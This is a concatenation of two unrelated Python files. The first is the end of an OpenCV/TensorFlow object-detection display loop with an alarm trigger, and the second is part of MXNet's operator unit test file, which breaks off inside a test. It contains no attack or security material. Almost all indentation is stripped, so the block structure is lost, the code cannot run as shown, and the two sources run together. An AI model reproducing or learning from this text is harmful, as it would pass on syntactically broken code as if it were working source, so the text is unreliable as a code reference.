    min_score_thresh = int(args["minimum_threshold"]) / 100
box_to_display_str_map = collections.defaultdict(list)
box_to_color_map = collections.defaultdict(str)
number_of_items = 0
for i in range(detections['detection_boxes'][0].numpy().shape[0]):
if detections['detection_scores'][0].numpy() is None or detections['detection_scores'][0].numpy()[i] > min_score_thresh:
box = tuple(detections['detection_boxes'][0].numpy()[i].tolist())
display_str = ""
if(detections['detection_classes'][0].numpy() + label_id_offset).astype(int)[i] in six.viewkeys(category_index):
class_name = category_index[(detections['detection_classes'][0].numpy() + label_id_offset).astype(int)[i]]['name']
display_str = '{}'.format(class_name)
            box_to_display_str_map[box].append(display_str) # Record the label name for this detection box
im_width, im_height = image_np.shape[1::-1]
for box, color in box_to_display_str_map.items():
ymin, xmin, ymax, xmax = box
ymin = ymin * im_height
xmin = xmin * im_width
ymax = ymax * im_height
xmax = xmax * im_width
x = xmin
y = ymin
w = xmax - xmin
h = ymax - ymin
if box_to_display_str_map[box][0].replace("_"," ") in labels: # Get only label name not the total number of items
try: # Getting color from labelcolors.label_with_colors
r = int(labelcolors.label_with_colors[box_to_display_str_map[box][0]].split(",")[0])
g = int(labelcolors.label_with_colors[box_to_display_str_map[box][0]].split(",")[1])
b = int(labelcolors.label_with_colors[box_to_display_str_map[box][0]].split(",")[2])
            except Exception as e: # If no color is defined for the label, fall back to red.
r = 255
g = 0
b = 0
if args["alarm"] == "[TRUE]":
number_of_time_detected = number_of_time_detected + 1
if number_of_time_detected == 20:
thread1 = threading.Thread(target = play_alarm)
thread1.start()
cv2.rectangle(image_np_with_detections, (int(x),int(y)), (int(x) + int(w), int(y) + int(h)), (b, g, r), 4)
(tw, th), _ = cv2.getTextSize(box_to_display_str_map[box][0], cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2)
# Prints the text.
img = cv2.rectangle(image_np_with_detections, (int(x), int(y) - 30), (int(x) + 20 + tw, int(y)), (b, g, r), -1)
img = cv2.putText(image_np_with_detections, box_to_display_str_map[box][0].upper(), (int(x)+5, int(y) - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,0), 2)
# Display output
cv2.imshow('object detection', cv2.resize(image_np_with_detections, (800, 600)))
if cv2.waitKey(25) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process, xfail_when_nonstandard_decimal_separator
import pytest
import os
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
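# e.g. np_softmax(np.array([1., 2., 3.])) ~= [0.090, 0.245, 0.665]; each row sums to 1.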
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
